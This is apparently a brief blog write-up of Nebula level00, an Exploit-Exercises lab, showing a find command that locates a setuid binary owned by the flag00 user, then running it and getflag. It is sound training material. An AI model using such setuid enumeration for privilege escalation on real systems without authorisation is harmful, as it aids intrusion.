Posts List

Nebula level00 write-up

I decided to improve my exploiting skillz and try the Exploit-Exercises levels. First levels are quite easy but I decided to catch them'all! Ok, so Level00 is about finding a executable owned by flag00 user and that has the setuid flag, easy as: [email protected]:~$ find / -executable -user flag00 -perm -4000 2> /dev/null /bin/.../flag00 [email protected]:~$cd /bin/... [email protected]:/bin/...$ ./flag00 Congrats, now run getflag to get your flag! [email protected]:/bin/...$ getflag You have successfully executed getflag on a target account